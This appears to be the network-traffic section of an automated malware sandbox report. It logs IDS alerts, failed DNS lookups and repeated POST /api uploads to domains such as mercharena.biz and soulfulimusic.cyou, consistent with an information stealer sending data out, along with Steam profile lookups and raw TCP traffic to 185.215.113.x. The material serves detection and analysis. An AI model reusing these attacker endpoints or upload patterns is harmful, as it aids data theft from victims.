Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50025 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50027 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50030 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50031 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50028 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50032 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50036 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50034 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50037 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50038 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50033 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50039 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50040 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50041 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50044 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50045 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50046 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50048 -> 172.67.155.64:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50049 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50054 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50061 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50060 -> 104.21.90.173:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50066 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50069 -> 104.21.90.173:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50067 -> 104.21.90.173:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50064 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50070 -> 104.21.90.173:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50071 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50068 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50072 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50063 -> 104.21.90.173:443

Source: unknown	DNS traffic detected: query: breedertremnd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ignoredshee.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: impolitewearr.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: actiothreaz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: garulouscuto.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: voicesharped.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: suggestyuoz.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: edcatiofireeu.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: toppyneedus.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pleasedcfrown.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: inputrreparnt.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: importenptoc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: torpdidebar.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hoursuhouy.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mixedrecipew.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: rebeldettern.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: affordtempyo.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lightdeerysua.biz replaycode: Name error (3)

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mercharena.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=TwVXZ4xwRQ5xap0X7k_MOBhybxBm4Jeamamm6kzhcZE-1739439309-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: mercharena.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=R5LEQ61S94Cookie: __cf_mw_byp=TwVXZ4xwRQ5xap0X7k_MOBhybxBm4Jeamamm6kzhcZE-1739439309-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12792Host: mercharena.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AS037NAFFARCookie: __cf_mw_byp=TwVXZ4xwRQ5xap0X7k_MOBhybxBm4Jeamamm6kzhcZE-1739439309-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15040Host: mercharena.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=U02Q2OZ8D7BYR6BCookie: __cf_mw_byp=TwVXZ4xwRQ5xap0X7k_MOBhybxBm4Jeamamm6kzhcZE-1739439309-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20554Host: mercharena.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=L91XM5B2OK7Cookie: __cf_mw_byp=TwVXZ4xwRQ5xap0X7k_MOBhybxBm4Jeamamm6kzhcZE-1739439309-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2288Host: mercharena.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1ZK17DARZPCDYFELNCookie: __cf_mw_byp=TwVXZ4xwRQ5xap0X7k_MOBhybxBm4Jeamamm6kzhcZE-1739439309-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569217Host: mercharena.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=TwVXZ4xwRQ5xap0X7k_MOBhybxBm4Jeamamm6kzhcZE-1739439309-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: mercharena.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: paleboreei.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=oD.IZjUTaDPkSWMJEedT0r5hwqAGdC3J0bggIeC3E1k-1739439325.9958305-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 50Host: paleboreei.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JH3TAJXZ75UHETCookie: __cf_mw_byp=oD.IZjUTaDPkSWMJEedT0r5hwqAGdC3J0bggIeC3E1k-1739439325.9958305-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2301Host: paleboreei.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HFF6RLHKCookie: __cf_mw_byp=oD.IZjUTaDPkSWMJEedT0r5hwqAGdC3J0bggIeC3E1k-1739439325.9958305-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1046Host: paleboreei.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=oD.IZjUTaDPkSWMJEedT0r5hwqAGdC3J0bggIeC3E1k-1739439325.9958305-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 85Host: paleboreei.biz
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: floweringtstrip.help
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=_.2Q4Qh5CcDlZ6_uLnwfIP11wnkaPaK_BAVQOdTqmLc-1739439334.1485343-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: floweringtstrip.help
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=B6ZN365573G6Cookie: __cf_mw_byp=_.2Q4Qh5CcDlZ6_uLnwfIP11wnkaPaK_BAVQOdTqmLc-1739439334.1485343-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2282Host: floweringtstrip.help
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WIMMSZ7TCookie: __cf_mw_byp=_.2Q4Qh5CcDlZ6_uLnwfIP11wnkaPaK_BAVQOdTqmLc-1739439334.1485343-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1032Host: floweringtstrip.help
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=_.2Q4Qh5CcDlZ6_uLnwfIP11wnkaPaK_BAVQOdTqmLc-1739439334.1485343-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: floweringtstrip.help
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: soulfulimusic.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=rC7e41ffNQl3JoJflG2FwvhH.8zJ6JV33BBnkT62zWY-1739439347-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: soulfulimusic.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2ZZ6OAL4PEHCookie: __cf_mw_byp=rC7e41ffNQl3JoJflG2FwvhH.8zJ6JV33BBnkT62zWY-1739439347-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12788Host: soulfulimusic.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IG1I0INJYVCookie: __cf_mw_byp=rC7e41ffNQl3JoJflG2FwvhH.8zJ6JV33BBnkT62zWY-1739439347-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15024Host: soulfulimusic.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1ZF28JCZOEHCookie: __cf_mw_byp=rC7e41ffNQl3JoJflG2FwvhH.8zJ6JV33BBnkT62zWY-1739439347-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20520Host: soulfulimusic.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9CGS3V19DNRN1P15FNCookie: __cf_mw_byp=rC7e41ffNQl3JoJflG2FwvhH.8zJ6JV33BBnkT62zWY-1739439347-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2339Host: soulfulimusic.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JYAPVJQ5HXODVQOUVMXCookie: __cf_mw_byp=rC7e41ffNQl3JoJflG2FwvhH.8zJ6JV33BBnkT62zWY-1739439347-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 577400Host: soulfulimusic.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=rC7e41ffNQl3JoJflG2FwvhH.8zJ6JV33BBnkT62zWY-1739439347-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: soulfulimusic.cyou
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: soulfulimusic.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=QQ29W57CWE1MMQ9XBxR0cUBlAwN4z4jBRBlSSTerhUs-1739439361-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: soulfulimusic.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2WZGLEF9LDCookie: __cf_mw_byp=QQ29W57CWE1MMQ9XBxR0cUBlAwN4z4jBRBlSSTerhUs-1739439361-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12782Host: soulfulimusic.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=I0CKYH2L96B6OCookie: __cf_mw_byp=QQ29W57CWE1MMQ9XBxR0cUBlAwN4z4jBRBlSSTerhUs-1739439361-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15042Host: soulfulimusic.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UYA0FC32D4Cookie: __cf_mw_byp=QQ29W57CWE1MMQ9XBxR0cUBlAwN4z4jBRBlSSTerhUs-1739439361-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20514Host: soulfulimusic.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JLBHR12JP4Cookie: __cf_mw_byp=QQ29W57CWE1MMQ9XBxR0cUBlAwN4z4jBRBlSSTerhUs-1739439361-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2288Host: soulfulimusic.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YKRPETZZTUH7FQ4Z46Cookie: __cf_mw_byp=QQ29W57CWE1MMQ9XBxR0cUBlAwN4z4jBRBlSSTerhUs-1739439361-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 577399Host: soulfulimusic.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=QQ29W57CWE1MMQ9XBxR0cUBlAwN4z4jBRBlSSTerhUs-1739439361-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: soulfulimusic.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mercharena.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=I_r9dWg5hnrDfb6pYqcdnNBP04B3hKWAKyRqSclBIqg-1739439393-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: mercharena.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GN7P9PPB2A2EMD4JCookie: __cf_mw_byp=I_r9dWg5hnrDfb6pYqcdnNBP04B3hKWAKyRqSclBIqg-1739439393-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12828Host: mercharena.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5OKKIXBJ8LHWNF0KY8VCookie: __cf_mw_byp=I_r9dWg5hnrDfb6pYqcdnNBP04B3hKWAKyRqSclBIqg-1739439393-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15088Host: mercharena.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LBCCGO4QY8E7VRI4Q2Cookie: __cf_mw_byp=I_r9dWg5hnrDfb6pYqcdnNBP04B3hKWAKyRqSclBIqg-1739439393-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20572Host: mercharena.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HA3TAJCSLMBVB533Y4Cookie: __cf_mw_byp=I_r9dWg5hnrDfb6pYqcdnNBP04B3hKWAKyRqSclBIqg-1739439393-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2391Host: mercharena.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FQ4P0RQ11Cookie: __cf_mw_byp=I_r9dWg5hnrDfb6pYqcdnNBP04B3hKWAKyRqSclBIqg-1739439393-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570453Host: mercharena.biz

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75

Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
